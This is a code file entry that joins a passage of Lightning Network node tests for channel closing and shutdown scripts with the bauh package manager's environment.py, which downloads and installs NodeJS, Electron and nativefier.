l1.daemon.wait_for_log(r'scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
# Figure out what address it will try to use.
keyidx = int(l1.db_query("SELECT intval FROM vars WHERE name='bip32_max_index';")[0]['intval'])
# Expect 1 for change address, plus 1 for the funding address of the actual
# funding tx.
addr = l1.rpc.call('dev-listaddrs', [keyidx + 2])['addresses'][-1]
# the above used to be keyidx + 3, but that was when `fundchannel`
# used the `txprepare`-`txdiscard`-`txprepare` trick, which skipped
# one address in the discarded tx.
# Now we use PSBTs, which means we never discard and skip an address.
# Now, if we specify upfront and it's OK, all good.
l1.stop()
# We need to prepend the segwit version (0) and push opcode (14).
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = '0014' + addr['bech32_redeemscript']
l1.start()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 1000000)
l1.rpc.close(l2.info['id'])
wait_for(lambda: sorted([c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']]) == ['CLOSINGD_COMPLETE', 'ONCHAIN', 'ONCHAIN'])
@pytest.mark.developer("needs to set upfront_shutdown_script")
def test_invalid_upfront_shutdown_script(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2, fundchannel=False)
l1 = node_factory.get_node(start=False, allow_warning=True)
# Insist on upfront script we're not going to match.
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = "76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac00"
l1.start()
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
with pytest.raises(RpcError, match=r'Unacceptable upfront_shutdown_script'):
l1.fundchannel(l2, 1000000, False)
@pytest.mark.developer("needs to set upfront_shutdown_script")
@pytest.mark.slow_test
def test_segwit_shutdown_script(node_factory, bitcoind, executor):
"""
Try a range of future segwit versions as shutdown scripts. We create many nodes, so this is quite slow under valgrind
"""
l1 = node_factory.get_node(allow_warning=True)
# BOLT #2:
# 5. if (and only if) `option_shutdown_anysegwit` is negotiated:
# * `OP_1` through `OP_16` inclusive, followed by a single push of 2 to 40 bytes
# (witness program versions 1 through 16)
edge_valid = ['51020000', '5128' + '00' * 0x28,
'60020000', '6028' + '00' * 0x28]
other_valid = ['52020000', '5228' + '00' * 0x28,
'53020000', '5328' + '00' * 0x28,
'54020000', '5428' + '00' * 0x28,
'55020000', '5528' + '00' * 0x28,
'56020000', '5628' + '00' * 0x28,
'57020000', '5728' + '00' * 0x28,
'58020000', '5828' + '00' * 0x28,
'59020000', '5928' + '00' * 0x28,
'5A020000', '5A28' + '00' * 0x28,
'5B020000', '5B28' + '00' * 0x28,
'5C020000', '5C28' + '00' * 0x28,
'5D020000', '5D28' + '00' * 0x28,
'5E020000', '5E28' + '00' * 0x28,
'5F020000', '5F28' + '00' * 0x28]
invalid = ['50020000', # Not OP_1-OP_16
'61020000', # Not OP_1-OP_16
'5102000000', # Extra bytes
'510100', # Too short
'5129' + '00' * 0x29] # Too long
# Don't stress CI; just test edge cases
if SLOW_MACHINE:
valid = edge_valid
else:
valid = edge_valid + other_valid
# More efficient to create them all up-front.
nodes = node_factory.get_nodes(len(valid) + len(invalid))
# Give it one UTXO to spend for each node.
addresses = {}
for n in nodes:
addresses[l1.rpc.newaddr()['bech32']] = (10**6 + 100000) / 10**8
bitcoind.rpc.sendmany("", addresses)
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) == len(addresses))
# FIXME: Since we don't support other non-v0 encodings, we need a protocol
# test for this (we're actually testing our upfront check, not the real
# shutdown one!),
for script in valid:
# Insist on upfront script we're not going to match.
l1.stop()
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = script
l1.start()
l2 = nodes.pop()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
for script in invalid:
# Insist on upfront script we're not going to match.
l1.stop()
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = script
l1.start()
l2 = nodes.pop()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
with pytest.raises(RpcError, match=r'Unacceptable upfront_shutdown_script'):
l1.rpc.fundchannel(l2.info['id'], 10**6)
@unittest.skipIf(not EXPERIMENTAL_FEATURES, "Needs anchor_outputs")
@pytest.mark.developer("needs to set dev-disconnect")
def test_closing_higherfee(node_factory, bitcoind, executor):
"""With anchor outputs we can ask for a *higher* fee than the last commit tx"""
# We change the feerate before it starts negotiating close, so it aims
# for *higher* than last commit tx.
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None,
'feerates': (7500, 7500, 7500, 7500),
'disconnect': ['-WIRE_CLOSING_SIGNED']},
{'may_reconnect': True,
'dev-no-reconnect': None,
'feerates': (7500, 7500, 7500, 7500)}])
# This will trigger disconnect.
fut = executor.submit(l1.rpc.close, l2.info['id'])
l1.daemon.wait_for_log('dev_disconnect')
# Now adjust fees so l1 asks for more on reconnect.
l1.set_feerates((30000,) * 4, False)
l2.set_feerates((30000,) * 4, False)
l1.restart()
l2.restart()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# This causes us to *exceed* previous requirements!
l1.daemon.wait_for_log(r'deriving max fee from rate 30000 -> 16440sat \(not 1000000sat\)')
# This will fail because l1 restarted!
with pytest.raises(RpcError, match=r'Channel forgotten before proper close.'):
fut.result(TIMEOUT)
# But we still complete negotiation!
wait_for(lambda: only_one(l1.rpc.listpeers()['peers'])['channels'][0]['state'] == 'CLOSINGD_COMPLETE')
wait_for(lambda: only_one(l2.rpc.listpeers()['peers'])['channels'][0]['state'] == 'CLOSINGD_COMPLETE')
@unittest.skipIf(True, "Test is extremely flaky")
@pytest.mark.developer("needs dev_disconnect")
def test_htlc_rexmit_while_closing(node_factory, executor):
"""Retranmitting an HTLC revocation while shutting down should work"""
# FIXME: This should be in lnprototest! UNRELIABLE.
# l1 disconnects after sending second COMMITMENT_SIGNED.
# Then it stops receiving after sending WIRE_SHUTDOWN (which is before it
# reads the revoke_and_ack).
disconnects = ['+WIRE_COMMITMENT_SIGNED*2',
'xWIRE_SHUTDOWN']
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None,
'disconnect': disconnects},
{'may_reconnect': True,
'dev-no-reconnect': None}])
# Start payment, will disconnect
l1.pay(l2, 200000)
wait_for(lambda: only_one(l1.rpc.listpeers()['peers'])['connected'] is False)
# Tell it to close (will block)
fut = executor.submit(l1.rpc.close, l2.info['id'])
# Original problem was with multiple disconnects, but to simplify we make
# l2 send shutdown too.
fut2 = executor.submit(l2.rpc.close, l1.info['id'])
# Reconnect, shutdown will continue disconnect again
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# Now l2 should be in CLOSINGD_SIGEXCHANGE, l1 still waiting on
# WIRE_REVOKE_AND_ACK.
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE')
assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CHANNELD_SHUTTING_DOWN'
# They don't realize they're not talking, so disconnect and reconnect.
l1.rpc.disconnect(l2.info['id'], force=True)
# Now it hangs, since l1 is expecting rexmit of revoke-and-ack.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
fut.result(TIMEOUT)
fut2.result(TIMEOUT)
@pytest.mark.openchannel('v1')
@pytest.mark.developer("needs dev_disconnect")
def test_you_forgot_closed_channel(node_factory, executor):
"""Ideally you'd keep talking to us about closed channels: simple"""
disconnects = ['xWIRE_CLOSING_SIGNED']
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None,
'disconnect': disconnects},
{'may_reconnect': True,
'dev-no-reconnect': None}])
l1.pay(l2, 200000)
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 considers the closing done, l1 does not
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE'
# l1 reconnects, it should succeed.
if only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected']:
l1.rpc.disconnect(l2.info['id'], force=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
fut.result(TIMEOUT)
@pytest.mark.developer("needs dev_disconnect")
def test_you_forgot_closed_channel_onchain(node_factory, bitcoind, executor):
"""Ideally you'd keep talking to us about closed channels: even if close is mined"""
disconnects = ['xWIRE_CLOSING_SIGNED']
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None,
'disconnect': disconnects},
{'may_reconnect': True,
'dev-no-reconnect': None}])
l1.pay(l2, 200000)
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 considers the closing done, l1 does not
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE'
# l1 does not see any new blocks.
def no_new_blocks(req):
return {"result": {"blockhash": None, "block": None}}
l1.daemon.rpcproxy.mock_rpc('getrawblockbyheight', no_new_blocks)
# Close transaction mined
bitcoind.generate_block(1, wait_for_mempool=1)
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'ONCHAIN')
# l1 reconnects, it should succeed.
# l1 will disconnect once it sees block
wait_for(lambda: only_one(l1.rpc.listpeers()['peers'])['connected'] is False)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
fut.result(TIMEOUT)
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Uses regtest addresses")
@pytest.mark.developer("too slow without fast polling for blocks")
def test_segwit_anyshutdown(node_factory, bitcoind, executor):
"""Try a range of future segwit versions for shutdown"""
l1, l2 = node_factory.line_graph(2, fundchannel=False)
l1.fundwallet(10**7)
# Based on BIP-320, but all changed to regtest.
addrs = ("BCRT1QW508D6QEJXTDG4Y5R3ZARVARY0C5XW7KYGT080",
"bcrt1qrp33g0q5c5txsp9arysrx4k6zdkfs4nce4xj0gdcccefvpysxf3qzf4jry",
"bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56",
"BCRT1SW50QT2UWHA",
"bcrt1zw508d6qejxtdg4y5r3zarvaryv2wuatf",
"bcrt1qqqqqp399et2xygdj5xreqhjjvcmzhxw4aywxecjdzew6hylgvseswlauz7",
"bcrt1pqqqqp399et2xygdj5xreqhjjvcmzhxw4aywxecjdzew6hylgvsesyga46z",
"bcrt1p0xlxvlhemja6c4dqv22uapctqupfhlxm9h8z3k2e72q4k9hcz7vqc8gma6")
for addr in addrs:
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
# If we don't actually make a payment, two of the above cases fail
# because the resulting tx is too small! Balance channel so close
# has two outputs.
bitcoind.generate_block(1, wait_for_mempool=1)
wait_for(lambda: any([c['state'] == 'CHANNELD_NORMAL' for c in only_one(l1.rpc.listpeers()['peers'])['channels']]))
l1.pay(l2, 10**9 // 2)
l1.rpc.close(l2.info['id'], destination=addr)
bitcoind.generate_block(1, wait_for_mempool=1)
wait_for(lambda: all([c['state'] == 'ONCHAIN' for c in only_one(l1.rpc.listpeers()['peers'])['channels']]))
@pytest.mark.developer("needs to manipulate features")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Uses regtest addresses")
def test_anysegwit_close_needs_feature(node_factory, bitcoind):
"""Rather than have peer reject our shutdown, we should refuse to shutdown toa v1+ address if they don't support it"""
# L2 says "no option_shutdown_anysegwit"
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True},
{'may_reconnect': True,
'dev-force-features': -27}])
with pytest.raises(RpcError, match=r'Peer does not allow v1\+ shutdown addresses'):
l1.rpc.close(l2.info['id'], destination='bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56')
# From TFM: "Tell your friends to upgrade!"
l2.stop()
del l2.daemon.opts['dev-force-features']
l2.start()
# Now it will work!
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.close(l2.info['id'], destination='bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56')
wait_for(lambda: only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
bitcoind.generate_block(1, wait_for_mempool=1)
def test_close_feerate_range(node_factory, bitcoind, chainparams):
"""Test the quick-close fee range negotiation"""
l1, l2 = node_factory.line_graph(2)
notifications = []
def save_notifications(message, progress, request, **kwargs):
notifications.append(message)
# Lowball the range here.
with l1.rpc.notify(save_notifications):
l1.rpc.close(l2.info['id'], feerange=['253perkw', 'normal'])
if not chainparams['elements']:
l1_range = [138, 4110]
l2_range = [1027, 1000000]
else:
# That fee output is a little chunky.
l1_range = [220, 6547]
l2_range = [1636, 1000000]
l1.daemon.wait_for_log('Negotiating closing fee between {}sat and {}sat satoshi'.format(l1_range[0], l1_range[1]))
l2.daemon.wait_for_log('Negotiating closing fee between {}sat and {}sat satoshi'.format(l2_range[0], l2_range[1]))
overlap = [max(l1_range[0], l2_range[0]), min(l1_range[1], l2_range[1])]
l1.daemon.wait_for_log('performing quickclose in range {}sat-{}sat'.format(overlap[0], overlap[1]))
log = l1.daemon.is_in_log('Their actual closing tx fee is .*sat')
rate = re.match('.*Their actual closing tx fee is ([0-9]*sat).*', log).group(1)
assert notifications == ['Sending closing fee offer {}, with range {}sat-{}sat'.format(rate,
l1_range[0],
l1_range[1]),
'Received closing fee offer {}, with range {}sat-{}sat'.format(rate,
l2_range[0],
l2_range[1])]
def test_close_twice(node_factory, executor):
# First feerate is too low, second fixes it.
l1, l2 = node_factory.line_graph(2, opts=[{'allow_warning': True,
'may_reconnect': True},
{'allow_warning': True,
'may_reconnect': True,
'feerates': (15000, 15000, 15000, 15000)}])
# This makes it disconnect, since feerate is too low.
fut = executor.submit(l1.rpc.close, l2.info['id'], feerange=['253perkw', '500perkw'])
l1.daemon.wait_for_log('WARNING.*Unable to agree on a feerate')
fut2 = executor.submit(l1.rpc.close, l2.info['id'], feerange=['253perkw', '15000perkw'])
# Now reconnect, it should work.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
assert fut.result(TIMEOUT)['type'] == 'mutual'
assert fut2.result(TIMEOUT)['type'] == 'mutual'
def test_close_weight_estimate(node_factory, bitcoind):
"""closingd uses the expected closing tx weight to constrain fees; make sure that lightningd agrees
once it has the actual agreed tx"""
l1, l2 = node_factory.line_graph(2)
l1.rpc.close(l2.info['id'])
# Closingd gives this estimate before it begins
log = l1.daemon.wait_for_log('Expected closing weight = ')
expected_weight = int(re.match('.*Expected closing weight = ([0-9]*),.*', log).group(1))
# This is the actual weight: in theory this could use their
# actual sig, and thus vary, but we don't do that.
log = l1.daemon.wait_for_log('Their actual closing tx fee is')
actual_weight = int(re.match('.*: weight is ([0-9]*).*', log).group(1))
assert actual_weight == expected_weight
log = l1.daemon.wait_for_log('sendrawtransaction: ')
tx = re.match('.*sendrawtransaction: ([0-9a-f]*).*', log).group(1)
# This could actually be a bit shorter: 1 in 256 chance we get
# lucky with a sig and it's shorter. We have 2 sigs, so that's
# 1 in 128. Unlikely to do better than 2 bytes off though!
signed_weight = int(bitcoind.rpc.decoderawtransaction(tx)['weight'])
assert signed_weight <= actual_weight
assert signed_weight >= actual_weight - 2
|
environment.py | import glob
import logging
import os
import shutil
import tarfile
import traceback
from datetime import datetime, timedelta
from pathlib import Path
from threading import Thread
from typing import Dict, List, Optional
import requests
import yaml
from bauh.api.abstract.download import FileDownloader
from bauh.api.abstract.handler import ProcessWatcher, TaskManager
from bauh.api.abstract.view import MessageType
from bauh.api.http import HttpClient
from bauh.commons import system
from bauh.commons.html import bold
from bauh.commons.system import SimpleProcess, ProcessHandler
from bauh.gems.web import ENV_PATH, NODE_DIR_PATH, NODE_BIN_PATH, NODE_MODULES_PATH, NATIVEFIER_BIN_PATH, \
ELECTRON_PATH, ELECTRON_DOWNLOAD_URL, ELECTRON_SHA256_URL, URL_ENVIRONMENT_SETTINGS, NPM_BIN_PATH, NODE_PATHS, \
nativefier, ELECTRON_WIDEVINE_URL, ELECTRON_WIDEVINE_SHA256_URL, \
ENVIRONMENT_SETTINGS_CACHED_FILE, ENVIRONMENT_SETTINGS_TS_FILE, get_icon_path, NATIVEFIER_BASE_URL
from bauh.gems.web.model import WebApplication
from bauh.view.util.translation import I18n
class EnvironmentComponent:
def __init__(self, id: str, name: str, size: str, version: str, url: str, update: bool = False, properties: Optional[dict] = None):
self.id = id
self.name = name
self.size = size
self.version = version
self.url = url
self.update = update
self.properties = properties
class EnvironmentUpdater:
def __init__(self, logger: logging.Logger, http_client: HttpClient, file_downloader: FileDownloader, i18n: I18n, taskman: Optional[TaskManager] = None):
self.logger = logger
self.file_downloader = file_downloader
self.i18n = i18n
self.http_client = http_client
self.task_read_settings_id = 'web_read_settings'
self.taskman = taskman
def _download_and_install(self, version: str, version_url: str, watcher: ProcessWatcher) -> bool:
self.logger.info("Downloading NodeJS {}: {}".format(version, version_url))
tarf_path = '{}/{}'.format(ENV_PATH, version_url.split('/')[-1])
downloaded = self.file_downloader.download(version_url, watcher=watcher, output_path=tarf_path, cwd=ENV_PATH)
if not downloaded:
self.logger.error("Could not download '{}'. Aborting...".format(version_url))
return False
else:
try:
tf = tarfile.open(tarf_path)
tf.extractall(path=ENV_PATH)
extracted_file = '{}/{}'.format(ENV_PATH, tf.getnames()[0])
if os.path.exists(NODE_DIR_PATH):
self.logger.info("Removing old NodeJS version installation dir -> {}".format(NODE_DIR_PATH))
try:
shutil.rmtree(NODE_DIR_PATH)
except:
self.logger.error("Could not delete old NodeJS version dir -> {}".format(NODE_DIR_PATH))
traceback.print_exc()
return False
try:
os.rename(extracted_file, NODE_DIR_PATH)
except:
self.logger.error("Could not rename the NodeJS version file {} as {}".format(extracted_file, NODE_DIR_PATH))
traceback.print_exc()
return False
if os.path.exists(NODE_MODULES_PATH):
self.logger.info('Deleting {}'.format(NODE_MODULES_PATH))
try:
shutil.rmtree(NODE_MODULES_PATH)
except:
self.logger.error("Could not delete the directory {}".format(NODE_MODULES_PATH))
return False
return True
except:
self.logger.error('Could not extract {}'.format(tarf_path))
traceback.print_exc()
return False
finally:
if os.path.exists(tarf_path):
try:
os.remove(tarf_path)
except:
self.logger.error('Could not delete file {}'.format(tarf_path))
def check_node_installed(self, version: str) -> bool:
if not os.path.exists(NODE_DIR_PATH):
return False
else:
installed_version = system.run_cmd('{} --version'.format(NODE_BIN_PATH), print_error=False)
if installed_version:
installed_version = installed_version.strip()
if installed_version.startswith('v'):
installed_version = installed_version[1:]
self.logger.info('Node versions: installed ({}), cloud ({})'.format(installed_version, version))
if version != installed_version:
self.logger.info("The NodeJs installed version is different from the Cloud.")
return False
else:
self.logger.info("Node is already up to date")
return True
else:
self.logger.warning("Could not determine the current NodeJS installed version")
return False
def update_node(self, version: str, version_url: str, watcher: ProcessWatcher = None) -> bool:
Path(ENV_PATH).mkdir(parents=True, exist_ok=True)
if not os.path.exists(NODE_DIR_PATH):
return self._download_and_install(version=version, version_url=version_url, watcher=watcher)
else:
installed_version = system.run_cmd('{} --version'.format(NODE_BIN_PATH), print_error=False)
if installed_version:
installed_version = installed_version.strip()
if installed_version.startswith('v'):
installed_version = installed_version[1:]
self.logger.info('Node versions: installed ({}), cloud ({})'.format(installed_version, version))
if version != installed_version:
self.logger.info("The NodeJs installed version is different from the Cloud.")
return self._download_and_install(version=version, version_url=version_url, watcher=watcher)
else:
self.logger.info("Node is already up to date")
return True
else:
self.logger.warning("Could not determine the current NodeJS installed version")
self.logger.info("Removing {}".format(NODE_DIR_PATH))
try:
shutil.rmtree(NODE_DIR_PATH)
return self._download_and_install(version=version, version_url=version_url, watcher=watcher)
except:
self.logger.error('Could not delete the dir {}'.format(NODE_DIR_PATH))
return False
def _install_node_lib(self, name: str, version: str, handler: ProcessHandler):
lib_repr = '{}{}'.format(name, '@{}'.format(version) if version else '')
self.logger.info("Installing {}".format(lib_repr))
if handler and handler.watcher:
handler.watcher.change_substatus(self.i18n['web.environment.install'].format(bold(lib_repr)))
proc = SimpleProcess([NPM_BIN_PATH, 'install', lib_repr], cwd=ENV_PATH, extra_paths=NODE_PATHS)
installed = handler.handle_simple(proc)[0]
if installed:
self.logger.info("{} successfully installed".format(lib_repr))
return installed
def _install_nativefier(self, version: str, url: str, handler: ProcessHandler) -> bool:
self.logger.info("Checking if nativefier@{} exists".format(version))
if not url or not self.http_client.exists(url):
self.logger.warning("The file {} seems not to exist".format(url))
handler.watcher.show_message(title=self.i18n['message.file.not_exist'],
body=self.i18n['message.file.not_exist.body'].format(bold(url)),
type_=MessageType.ERROR)
return False
success = self._install_node_lib('nativefier', version, handler)
if success:
return self._is_nativefier_installed()
def _is_nativefier_installed(self) -> bool:
return os.path.exists(NATIVEFIER_BIN_PATH)
def download_electron(self, version: str, url: str, widevine: bool, watcher: ProcessWatcher) -> bool:
Path(ELECTRON_PATH).mkdir(parents=True, exist_ok=True)
self.logger.info("Downloading Electron {}".format(version))
electron_path = self._get_electron_file_path(url=url, relative=False)
if not self.http_client.exists(url):
self.logger.warning("The file {} seems not to exist".format(url))
watcher.show_message(title=self.i18n['message.file.not_exist'],
body=self.i18n['message.file.not_exist.body'].format(bold(url)),
type_=MessageType.ERROR)
return False
return self.file_downloader.download(file_url=url, watcher=watcher, output_path=electron_path, cwd=ELECTRON_PATH)
def download_electron_sha256(self, version: str, url: str, widevine: bool, watcher: ProcessWatcher) -> bool:
self.logger.info("Downloading Electron {} sha526".format(version))
sha256_path = self._get_electron_file_path(url=url, relative=False)
if not self.http_client.exists(url):
self.logger.warning("The file {} seems not to exist".format(url))
watcher.show_message(title=self.i18n['message.file.not_exist'],
body=self.i18n['message.file.not_exist.body'].format(bold(url)),
type_=MessageType.ERROR)
return False
return self.file_downloader.download(file_url=url, watcher=watcher, output_path=sha256_path, cwd=ELECTRON_PATH)
def _get_electron_url(self, version: str, is_x86_x64_arch: bool, widevine: bool) -> str:
arch = 'x64' if is_x86_x64_arch else 'ia32'
if widevine:
return ELECTRON_WIDEVINE_URL.format(version=version, arch=arch)
else:
return ELECTRON_DOWNLOAD_URL.format(version=version, arch=arch)
def _get_electron_sha256_url(self, version: str, widevine: bool) -> str:
if widevine:
return ELECTRON_WIDEVINE_SHA256_URL.format(version=version)
else:
return ELECTRON_SHA256_URL.format(version=version)
def _get_electron_file_path(self, url: str, relative: bool) -> str:
file_path = url.replace(':', '').replace('/', '') + '/' + url.split('/')[-1]
return '{}/{}'.format(ELECTRON_PATH, file_path) if not relative else file_path
def check_electron_installed(self, version: str, is_x86_x64_arch: bool, widevine: bool) -> Dict[str, bool]:
self.logger.info("Checking if Electron {} (widevine={}) is installed".format(version, widevine))
res = {'electron': False, 'sha256': False}
if not os.path.exists(ELECTRON_PATH):
self.logger.info("The Electron folder {} was not found".format(ELECTRON_PATH))
else:
files = {f.split(ELECTRON_PATH + '/')[1] for f in glob.glob(ELECTRON_PATH + '/**', recursive=True) if os.path.isfile(f)}
if files:
electron_url = self._get_electron_url(version, is_x86_x64_arch, widevine)
file_path = self._get_electron_file_path(url=electron_url, relative=True)
res['electron'] = file_path in files
if not res['electron']:
res['sha256'] = True
else:
sha_url = self._get_electron_sha256_url(version=version, widevine=widevine)
sha_path = self._get_electron_file_path(url=sha_url, relative=True)
res['sha256'] = sha_path in files
else:
self.logger.info('No Electron file found in {}'.format(ELECTRON_PATH))
for att in ('electron', 'sha256'):
if res[att]:
self.logger.info('{} ({}) already downloaded'.format(att, version))
return res
def _finish_task_download_settings(self):
if self.taskman:
self.taskman.update_progress(self.task_read_settings_id, 100, None)
self.taskman.finish_task(self.task_read_settings_id)
def should_download_settings(self, web_config: dict) -> bool:
try:
settings_exp = int(web_config['environment']['cache_exp'])
except ValueError:
self.logger.error("Could not parse settings property 'environment.cache_exp': {}".format(web_config['environment']['cache_exp']))
return True
if settings_exp <= 0:
self.logger.info("No expiration time configured for the environment settings cache file.")
return True
self.logger.info("Checking cached environment settings file")
if not os.path.exists(ENVIRONMENT_SETTINGS_CACHED_FILE):
self.logger.warning("Environment settings file not cached.")
return True
if not os.path.exists(ENVIRONMENT_SETTINGS_TS_FILE):
self.logger.warning("Environment settings file has no timestamp associated with it.")
return True
with open(ENVIRONMENT_SETTINGS_TS_FILE) as f:
env_ts_str = f.read()
try:
env_timestamp = datetime.fromtimestamp(float(env_ts_str))
except:
self.logger.error("Could not parse environment settings file timestamp: {}".format(env_ts_str))
return True
expired = env_timestamp + timedelta(hours=settings_exp) <= datetime.utcnow()
if expired:
self.logger.info("Environment settings file has expired. It should be re-downloaded")
return True
else:
self.logger.info("Cached environment settings file is up to date")
return False
def read_cached_settings(self, web_config: dict) -> Optional[dict]:
if not self.should_download_settings(web_config):
with open(ENVIRONMENT_SETTINGS_CACHED_FILE) as f:
cached_settings_str = f.read()
try:
return yaml.safe_load(cached_settings_str)
except yaml.YAMLError:
self.logger.error('Could not parse the cache environment settings file: {}'.format(cached_settings_str))
def read_settings(self, web_config: dict, cache: bool = True) -> Optional[dict]:
if self.taskman:
self.taskman.register_task(self.task_read_settings_id, self.i18n['web.task.download_settings'], get_icon_path())
self.taskman.update_progress(self.task_read_settings_id, 1, None)
cached_settings = self.read_cached_settings(web_config) if cache else None
if cached_settings:
return cached_settings
try:
if self.taskman:
self.taskman.update_progress(self.task_read_settings_id, 10, None)
self.logger.info("Downloading environment settings")
res = self.http_client.get(URL_ENVIRONMENT_SETTINGS)
if not res:
self.logger.warning('Could not retrieve the environments settings from the cloud')
self._finish_task_download_settings()
return
try:
settings = yaml.safe_load(res.content)
except yaml.YAMLError:
self.logger.error('Could not parse environment settings: {}'.format(res.text))
self._finish_task_download_settings()
return
self.logger.info("Caching environment settings to disk")
cache_dir = os.path.dirname(ENVIRONMENT_SETTINGS_CACHED_FILE)
try:
Path(cache_dir).mkdir(parents=True, exist_ok=True)
except OSError:
self.logger.error("Could not create Web cache directory: {}".format(cache_dir))
self.logger.info('Finished')
self._finish_task_download_settings()
return
cache_timestamp = datetime.utcnow().timestamp()
with open(ENVIRONMENT_SETTINGS_CACHED_FILE, 'w+') as f:
f.write(yaml.safe_dump(settings))
with open(ENVIRONMENT_SETTINGS_TS_FILE, 'w+') as f:
f.write(str(cache_timestamp))
self._finish_task_download_settings()
self.logger.info("Finished")
return settings
except requests.exceptions.ConnectionError:
self._finish_task_download_settings()
return
def _check_and_fill_electron(self, pkg: WebApplication, env: dict, local_config: dict, x86_x64: bool, widevine: bool, output: List[EnvironmentComponent]):
electron_version = env['electron-wvvmp' if widevine else 'electron']['version']
if not widevine and pkg.version and pkg.version != electron_version: # this feature does not support custom widevine electron at the moment
self.logger.info('A preset Electron version is defined for {}: {}'.format(pkg.url, pkg.version))
electron_version = pkg.version
if not widevine and local_config['environment']['electron']['version']:
self.logger.warning("A custom Electron version will be used {} to install {}".format(electron_version, pkg.url))
electron_version = local_config['environment']['electron']['version']
electron_status = self.check_electron_installed(version=electron_version, is_x86_x64_arch=x86_x64, widevine=widevine)
electron_url = self._get_electron_url(version=electron_version, is_x86_x64_arch=x86_x64, widevine=widevine)
output.append(EnvironmentComponent(name=electron_url.split('/')[-1],
version=electron_version,
url=electron_url,
size=self.http_client.get_content_length(electron_url),
id='electron',
update=not electron_status['electron'],
properties={'widevine': widevine}))
sha_url = self._get_electron_sha256_url(version=electron_version, widevine=widevine)
output.append(EnvironmentComponent(name=sha_url.split('/')[-1],
version=electron_version,
url=sha_url,
size=self.http_client.get_content_length(sha_url),
id='electron_sha256',
update=not electron_status['electron'] or not electron_status['sha256'],
properties={'widevine': widevine}))
def _check_and_fill_node(self, env: dict, output: List[EnvironmentComponent]):
node = EnvironmentComponent(name=env['nodejs']['url'].split('/')[-1],
url=env['nodejs']['url'],
size=self.http_client.get_content_length(env['nodejs']['url']),
version=env['nodejs']['version'],
id='nodejs')
output.append(node)
native = self._map_nativefier_file(env['nativefier'])
output.append(native)
if not self.check_node_installed(env['nodejs']['version']):
node.update, native.update = True, True
else:
if not self._check_nativefier_installed(env['nativefier']):
native.update = True
def _check_nativefier_installed(self, nativefier_settings: dict) -> bool:
if not os.path.exists(NODE_MODULES_PATH):
self.logger.info('Node modules path {} not found'.format(NODE_MODULES_PATH))
return False
else:
if not self._is_nativefier_installed():
return False
installed_version = nativefier.get_version()
if installed_version:
installed_version = installed_version.strip()
self.logger.info("Nativefier versions: installed ({}), cloud ({})".format(installed_version, nativefier_settings['version']))
if nativefier_settings['version'] != installed_version:
self.logger.info("Installed nativefier version is different from cloud's. Changing version.")
return False
self.logger.info("Nativefier is already installed and up to date")
return True
def _map_nativefier_file(self, nativefier_settings: dict) -> EnvironmentComponent:
base_url = nativefier_settings.get('url')
if not base_url:
